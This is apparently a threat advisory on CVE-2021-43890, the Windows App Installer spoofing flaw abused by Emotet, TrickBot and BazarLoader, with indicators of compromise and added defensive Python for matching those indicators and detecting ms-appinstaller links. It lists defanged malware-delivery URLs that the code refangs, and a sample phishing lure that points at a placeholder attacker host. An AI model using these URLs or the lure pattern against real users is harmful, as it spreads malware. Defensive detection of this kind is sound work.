

February 8, 2022
Severity
High
Analysis Summary
The threat actors behind major malware families such as Emotet, TrickBot, and BazarLoader have been actively exploiting a Microsoft vulnerability tracked as CVE-2021-43890 (Windows AppX Installer Spoofing Vulnerability) to deliver their payloads.
CVE-2021-43890
Microsoft Windows could allow a remote attacker to conduct a spoofing attack, caused by a flaw in the AppX Installer (the App Installer component that handles MSIX/AppX packages). By persuading a victim to install a specially crafted package, for example through a link or attachment that opens the App Installer prompt, an attacker could exploit this vulnerability to conduct a spoofing attack and have the victim install malware.
According to Microsoft, “An attacker could craft a malicious attachment to be used in phishing campaigns. The attacker would then have to convince the user to open the specially crafted attachment. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.”
To stop threat actors from abusing the ms-appinstaller protocol handler, Microsoft temporarily disabled it. The MSIX app package format keeps the functionality of enabling new, modern packaging alongside existing app packages and installation files. The ms-appinstaller: protocol makes it easier to give users a smooth installation experience and to keep applications updated: a link of the form ms-appinstaller:?source=<package URL> hands the package location straight to Windows App Installer, which fetches what it needs and shows the install prompt, so the user can install an app without first downloading the entire MSIX package. That same convenience is what the phishing lures exploit, since one click on such a link lands the victim directly in an install dialog for the attacker's package.
Impact
- Malware Infection
- Spoofing
Affected Vendors
Microsoft
Affected Products
- Microsoft Windows 10 x32
- Microsoft Windows 10 x64
- Microsoft Windows 10 1809 for x64-based Systems
- Microsoft Windows Server 2016
- Microsoft Windows 10 1809 for 32-bit Systems
- Microsoft Windows 10 1809 for ARM64-based Systems
- Microsoft Windows 10 1607 for 32-bit Systems
- Microsoft Windows 10 1607 for x64-based Systems
- Microsoft Windows Server version 1909
- Microsoft Windows 10 2004 for 32-bit Systems
- Microsoft Windows 10 2004 for ARM64-based Systems
- Microsoft Windows 10 2004 for x64-based Systems
- Microsoft Windows 10 1909 for 32-bit Systems
- Microsoft Windows 10 1909 for x64-based Systems
- Microsoft Windows 10 1909 for ARM64-based Systems
- Microsoft Windows 10 20H2 for 32-bit Systems
- Microsoft Windows 10 20H2 for ARM64-based Systems
- Microsoft Windows 10 20H2 for x64-based Systems
- Microsoft Windows Server (Server Core installation) 1909
- Microsoft Windows Server (Server Core installation) 2004
- Microsoft Windows Server (Server Core installation) 20H2
- Microsoft Windows Server (Server Core installation) 2016
- Microsoft Windows 10 21H1 for 32-bit Systems
- Microsoft Windows 10 21H1 for ARM64-based Systems
- Microsoft Windows 10 21H1 for x64-based Systems
- Microsoft App Installer
Indicators of Compromise
CVE
- CVE-2021-43890
Filename
- COVID 19 LETTER[.]xls
- Covid Test Results[.]xls
- COVID-19-07[.]02[.]22[.]xls
- 401K COVID-19 Options[.]xls
- COVID results[.]xls
MD5
- aa44678e2c740b188e95fda91bbccc82
- f337dd15ab013d482275fae623464c34
SHA-256
- df74062200f197a2fb8a5bc63b950e2ec9425005900cd2a1a273fdd53b1bc795
- 937dc9c1d35085a37333f1af629af0c884480e8fea555682f831160d8e968486
SHA-1
- 2fe098078bdfb0771cc67b6835abf01209a64408
- 067d5e8e3b896983fe9a6b50ded0a17ee09f8716
URL
- http[:]//wyldfyrearabians[.]com/cgi/1HyEagziS/
- https[:]//www[.]madridvisits[.]com/e7gnd/pXk/
- http[:]//tatatrucksblog[.]tatamotors[.]com/wp-includes/ttywllmLfAdU51d5O/
- http[:]//pickuptnblog[.]tatamotors[.]com/iyc6qmm/11lz0UGDvT/
- https[:]//shejiguanjia[.]com/wp-includes/PjsuDhy5/
- https[:]//fullness-safety[.]com/-/P6x/
- https[:]//nabajyotifoundation[.]com/da8uc7jo/4Za/
- https[:]//dwwmaster[.]com/wp-content/ebHTB4UF2/
- http[:]//formula8020[.]com/css/56Dzi0P/
- https[:]//calad-formation[.]fr/r3x94z/kgZ9OGCi/
- http[:]//lissbernardin[.]com/hthjb3i/x9KHpCeYrr/
- http[:]//royalsnackmyanmar[.]com/wp-includes/GMtz6DxM/
- http[:]//pristineservices[.]findfacts[.]co[.]in/cgi-bin/BuLyc2HKLHIQVHQLc/
- http[:]//speedrankingsystem[.]de/wp-admin/k63ZcimPsE6/
- https[:]//tigela[.]org[.]np/wp-content/Irp27O71/
- https[:]//royaltyrealtynsb[.]com/backup_1/g51THhhLLUqodx6/
- http[:]//bachilleratoporciclos[.]co/wp-content/PvIIx7/
- https[:]//edu-media[.]cn/wp-admin/cKi/
- https[:]//rtd[.]b2bpipe[.]cn/wp-content/8ESRhIJAIRh/
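The indicators above are published defanged, so they have to be refanged before they can be compared with proxy logs or hash exports. The following is an added example (not Rewterz tooling) that refangs a subset of the listed URLs and all six hashes, looks up digests by length, and scans proxy-log lines; the log lines and the log format are constructed for illustration. Note that several listed hosts are compromised legitimate sites (the WordPress paths give that away), so a hostname-only hit is treated as weaker than a full-URL hit.

```python
"""Check local artefacts against the IOCs listed in this alert.

Added example, not Rewterz tooling. The indicators below are copied from
the alert (a subset of the URLs, all six hashes) in their defanged form;
the proxy log lines and their format are constructed for illustration.
"""
import hashlib
import re
from typing import Iterable, Optional
from urllib.parse import urlsplit

DEFANGED_URLS = [
    "http[:]//wyldfyrearabians[.]com/cgi/1HyEagziS/",
    "https[:]//www[.]madridvisits[.]com/e7gnd/pXk/",
    "http[:]//tatatrucksblog[.]tatamotors[.]com/wp-includes/ttywllmLfAdU51d5O/",
    "https[:]//edu-media[.]cn/wp-admin/cKi/",
]
HASHES = {
    "md5": {"aa44678e2c740b188e95fda91bbccc82",
            "f337dd15ab013d482275fae623464c34"},
    "sha1": {"2fe098078bdfb0771cc67b6835abf01209a64408",
             "067d5e8e3b896983fe9a6b50ded0a17ee09f8716"},
    "sha256": {"df74062200f197a2fb8a5bc63b950e2ec9425005900cd2a1a273fdd53b1bc795",
               "937dc9c1d35085a37333f1af629af0c884480e8fea555682f831160d8e968486"},
}


def refang(ioc: str) -> str:
    """Undo [.] / [:] / hxxp defanging so the value compares against live data."""
    return (ioc.replace("[.]", ".").replace("[:]", ":")
               .replace("hxxps://", "https://").replace("hxxp://", "http://"))


URLS = {refang(u) for u in DEFANGED_URLS}
# Many of these hosts are compromised legitimate sites (note the WordPress
# paths), so a hostname-only match is a weaker signal than a full-URL match.
HOSTS = {urlsplit(u).hostname for u in URLS}


def digests(data: bytes) -> dict:
    """MD5/SHA-1/SHA-256 of a blob, keyed like HASHES."""
    return {algo: hashlib.new(algo, data).hexdigest() for algo in HASHES}


def lookup_hash(digest: str) -> Optional[str]:
    """Return the algorithm name if a hex digest is on the list, else None.

    The algorithm is inferred from the digest length, so EDR exports that
    mix MD5/SHA-1/SHA-256 columns can be fed in unchanged.
    """
    d = digest.strip().lower()
    algo = {32: "md5", 40: "sha1", 64: "sha256"}.get(len(d))
    return algo if algo and d in HASHES[algo] else None


# Constructed proxy-log shape: "<epoch> <client-ip> <method> <url> <status>".
LOG_RE = re.compile(r"\s(?P<method>[A-Z]+)\s(?P<url>https?://\S+)\s(?P<status>\d{3})\b")


def scan_proxy_log(lines: Iterable[str]) -> list:
    """Return (line_no, url, confidence) for lines that touch a listed URL or host."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = LOG_RE.search(line)
        if not m:
            continue
        url = m.group("url")
        if url in URLS:
            hits.append((n, url, "exact-url"))
        elif urlsplit(url).hostname in HOSTS:
            hits.append((n, url, "host-only"))
    return hits


# Constructed sample log, not real traffic.
SAMPLE_LOG = [
    "1644300001.123 10.0.0.14 GET http://wyldfyrearabians.com/cgi/1HyEagziS/ 200",
    "1644300002.456 10.0.0.14 GET https://edu-media.cn/wp-admin/cKi/ 200",
    "1644300003.789 10.0.0.22 GET https://www.madridvisits.com/contact 200",
    "1644300004.000 10.0.0.31 GET https://example.org/index.html 200",
]

if __name__ == "__main__":
    for hit in scan_proxy_log(SAMPLE_LOG):
        print(hit)
    print(lookup_hash("AA44678E2C740B188E95FDA91BBCCC82"))
```

To use it against real data, replace DEFANGED_URLS with the full list above, point scan_proxy_log at your proxy export (adjusting LOG_RE to its column order), and feed lookup_hash the hash column of an EDR or mail-gateway export; host-only hits against the compromised WordPress sites should be reviewed rather than blocked outright.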
Remediation
Remove the ‘ms-appinstaller:?source=’ prefix from install links if your website uses the ms-appinstaller protocol, so that links point directly at the package file.
Visit the Microsoft Security Response Center page for patches, updates, and workarounds:
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-43890
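Both the protocol description in the Analysis Summary and the remediation above come down to the same piece of markup: an ms-appinstaller:?source= link whose source= value is the package URL that Windows App Installer will fetch. The following added example (not Microsoft's or Rewterz's code) finds such links in web or mail content, flags ones whose package host is not on an allowlist (a phishing lure points source= at the attacker's host), and applies the remediation by rewriting the href to the package URL itself. The HTML is constructed; example.com and attacker.example are placeholder hosts, not indicators from this alert.

```python
"""Find and defuse ms-appinstaller:?source= links in web or mail content.

Added example, not Microsoft's or Rewterz's code. The ms-appinstaller: URI
scheme hands the URL in its source= parameter to Windows App Installer,
which fetches the package and shows the install prompt; the remediation in
this alert is to drop that prefix so links point at the package itself.
All HTML below is constructed; example.com / attacker.example are
placeholder hosts, not indicators from the alert.
"""
import re
from typing import Iterable
from urllib.parse import urlsplit

# source= runs to the end of the attribute/word; the scheme is matched
# case-insensitively because the handler does not care about case either.
APPINSTALLER_RE = re.compile(r"""ms-appinstaller:\?source=([^\s"'<>]+)""", re.I)
HREF_RE = re.compile(r"""href=(["'])ms-appinstaller:\?source=([^"']+)\1""", re.I)


def find_appinstaller_links(text: str) -> list:
    """Return every package URL handed to App Installer via the protocol."""
    return APPINSTALLER_RE.findall(text)


def suspicious_sources(text: str, trusted_hosts: Iterable[str]) -> list:
    """Package URLs whose host is not one you publish packages from.

    A phishing lure using this protocol points source= at the attacker's
    package host, so anything outside the allowlist deserves a look.
    """
    trusted = {h.lower() for h in trusted_hosts}
    return [u for u in find_appinstaller_links(text)
            if urlsplit(u).hostname not in trusted]


def remediate_html(html: str) -> str:
    """Rewrite href="ms-appinstaller:?source=URL" to href="URL" (this alert's remediation)."""
    return HREF_RE.sub(r"href=\1\2\1", html)


# Constructed sample page: one legitimate install link, one lure, one plain link.
SAMPLE_HTML = """
<p>Install our app: <a href="ms-appinstaller:?source=https://apps.example.com/Contoso.msixbundle">Install</a></p>
<p>Your invoice: <a href="MS-APPINSTALLER:?source=http://attacker.example/Invoice.msixbundle">Open</a></p>
<p>Docs: <a href="https://apps.example.com/docs/">Help</a></p>
"""

if __name__ == "__main__":
    print(find_appinstaller_links(SAMPLE_HTML))
    print(suspicious_sources(SAMPLE_HTML, {"apps.example.com"}))
    print(remediate_html(SAMPLE_HTML))
```

After remediate_html the user downloads the whole .msixbundle and opens it, which is exactly the behaviour Microsoft's temporary disabling of the handler forces anyway; suspicious_sources is the mail-gateway side of the same check, useful for catching lures that arrive as links rather than attachments.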